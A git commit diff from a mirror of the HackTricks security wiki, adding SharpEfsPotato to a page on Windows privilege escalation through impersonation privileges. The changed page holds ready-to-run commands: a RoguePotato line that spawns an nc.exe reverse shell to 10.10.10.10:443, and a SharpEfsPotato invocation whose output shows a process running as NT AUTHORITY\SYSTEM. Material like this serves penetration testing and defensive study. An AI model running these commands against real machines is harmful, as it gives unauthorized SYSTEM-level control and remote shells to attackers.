mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GitBook: [#3612] No subject
This commit is contained in:
parent
f19c8770a6
commit
6c972ba65b
3 changed files with 25 additions and 4 deletions
|
@ -154,7 +154,7 @@
|
|||
* [Named Pipe Client Impersonation](windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md)
|
||||
* [PowerUp](windows-hardening/windows-local-privilege-escalation/powerup.md)
|
||||
* [Privilege Escalation with Autoruns](windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md)
|
||||
* [RoguePotato and PrintSpoofer](windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md)
|
||||
* [RoguePotato, PrintSpoofer, SharpEfsPotato](windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md)
|
||||
* [RottenPotato](windows-hardening/windows-local-privilege-escalation/rottenpotato.md)
|
||||
* [Seatbelt](windows-hardening/windows-local-privilege-escalation/seatbelt.md)
|
||||
* [SeDebug + SeImpersonate copy token](windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md)
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
</details>
|
||||
|
||||
{% hint style="warning" %}
|
||||
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer) and [**RoguePotato**](https://github.com/antonioCoco/RoguePotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_
|
||||
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_
|
||||
{% endhint %}
|
||||
|
||||
{% content-ref url="roguepotato-and-printspoofer.md" %}
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# RoguePotato and PrintSpoofer
|
||||
# RoguePotato, PrintSpoofer, SharpEfsPotato
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -13,7 +13,7 @@
|
|||
</details>
|
||||
|
||||
{% hint style="warning" %}
|
||||
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer) and [**RoguePotato**](https://github.com/antonioCoco/RoguePotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
|
||||
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
|
||||
{% endhint %}
|
||||
|
||||
## Quick Demo
|
||||
|
@ -41,6 +41,27 @@ NULL
|
|||
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
|
||||
```
|
||||
|
||||
### SharpEfsPotato
|
||||
|
||||
```
|
||||
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
|
||||
SharpEfsPotato by @bugch3ck
|
||||
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
|
||||
|
||||
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
|
||||
|
||||
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
|
||||
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
|
||||
[x]RpcBindingSetAuthInfo failed with status 0x6d3
|
||||
[+] Server connected to our evil RPC pipe
|
||||
[+] Duplicated impersonation token ready for process creation
|
||||
[+] Intercepted and authenticated successfully, launching program
|
||||
[+] Process created, enjoy!
|
||||
|
||||
C:\temp>type C:\temp\w.log
|
||||
nt authority\system
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
|
Loading…
Reference in a new issue